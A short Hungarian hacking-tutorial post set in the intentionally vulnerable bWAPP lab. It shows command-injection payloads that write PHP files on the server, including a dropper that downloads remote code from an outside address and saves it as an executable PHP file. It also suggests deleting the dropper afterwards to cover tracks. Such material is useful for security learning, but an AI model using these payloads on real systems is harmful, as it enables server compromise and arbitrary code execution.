Maradunk az előző témánál. Láthattuk, hogy miként tudunk bizonyos sérülékenységeknél fileokat létrehozni, módosítani, törölni. Már arról is lehet elképzelésünk, hogy miként lehet ezeket felhasználni.

Most nem is csinálunk semmi újat inkább a módszert finomítjuk. Az előző példában is láttuk hogy kódjainkat egy max kb 30 karakteres input mezőbe kellett beilleszteni. Persze nem volt limitálva, és ha lett volna sem okozna gondot - erről majd később, De mi most mégsem egy ilyen pici mezőbe akarjuk illeszgetni a kódjainkat, ami tegyük fel legyen most 50 soros.

Hogyan lehetne még létrehozni filet?

Mutatom:
a példa kedvéért megint a bWAPP-ba teszem fel az amúgy külsőleg használt file-t ami egy txt.
Menjunk a /bWAPP/commandi.php oldalra, majd hozzunk létre egy txt fájlt:

; echo "<?php echo 'mukodik az oldal'; \$a = 5; \$b = 10; \$osszeg = \$a + \$b; echo \$osszeg; ?>" > forras.txt

ebben van kiíratás, vannak változók és egy összeadás is. A valóságban ezt szépen megszerkesztjük hosszan, és valami ftp-re feltöltjük kényelmesen, ahonnan a következő kis script-tel beolvassuk a tartalmát és ki is íratjuk egy php fájlba:

;echo "<?php \$tartalom = file_get_contents('http://192.168.100.5/bWAPP/forras.txt'); \$myfile = fopen('forras.php', 'w'); fwrite(\$myfile, '\n'.\$tartalom); fclose(\$myfile);echo 'lefutva'; ?>" > proba.php

ezután, ha lefuttatjuk a a proba.php-t az elkészíti nekünk a forrás.php-t. Ha azt lefuttatjuk a következő eredményt kapjuk:

mukodik az oldal15

nem egy szép kimenet, de ezt kértük tőle :) bemutatásra tökéletes. Ezután eltűntetjük a a proba.php-t és boldogok vagyunk.

A mai hack igazán egyszerű dolog, de szerintem hasznos lehet sok esetben, és jó tudni hogy ez a módszer működik!!!

ch3llenger